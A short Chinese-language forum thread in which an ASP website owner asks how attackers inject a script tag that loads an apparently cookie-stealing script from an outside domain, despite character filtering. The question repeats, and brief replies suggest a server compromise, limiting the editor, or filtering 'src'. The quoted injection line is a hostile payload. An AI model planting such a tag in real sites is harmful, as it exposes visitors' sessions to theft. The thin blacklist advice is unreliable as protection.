我的网站form表单执行过滤的字符串有(网站程序是asp的):<>&" 空格但有好多的黑客可以插入类似这样的代码到我的网站:
<script src="http://3dyuce.org/cookie.js"></script>
请问他们是如何做到的,我应当如何屏蔽?谢谢
<script src="http://3dyuce.org/cookie.js"></script>
请问他们是如何做到的,我应当如何屏蔽?谢谢
或者是服务器有漏洞,被挂马后干的
第二:有限度度允许用户使用编辑器
或后台过滤src之类的信息